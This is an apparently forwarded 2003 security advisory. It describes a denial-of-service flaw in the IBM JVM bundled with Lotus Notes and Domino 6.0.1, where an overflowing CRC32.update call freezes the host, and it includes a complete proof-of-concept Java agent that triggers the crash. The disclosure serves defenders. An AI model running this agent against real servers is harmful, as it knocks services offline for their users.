Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd)

[Marc Schoenefeld <schonef () uni-muenster de>]

Hi,

the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1
and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory
is not freed and causes the server machine (observed on MS XP) to
freeze and deny further service.

IMPLICATIONS
- If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
- if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.

ANALYSIS:
The call to the "update" method of the CRC32 raises an integer overflow
in the java java.util.zip.* core libraries which triggers a jni routine
that cannot handle the extreme high input value.

HISTORY:
This vulnerability has already been detected in the Sun JDK
(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
and was disclosed at Blackhat Windows 2003.
The background of this bugs is described at www.illegalaccess.org

Sincerely
Marc Schoenefeld

=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;

public class JavaAgent extends AgentBase {

        public void NotesMain() {

                try {
                        Session session = getSession();
                        AgentContext agentContext =
session.getAgentContext();
                         CRC32 crc32 = new CRC32();
        crc32.update(new byte[0], 4, 0x7ffffffc);

                        // (Your code goes here)

                } catch(Exception e) {
                        e.printStackTrace();
                }
        }
}
=========================Agent Source Code===========================


--

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
[ PGP Signature ok - Sun Apr  6 23:10:07 MES 2003 ]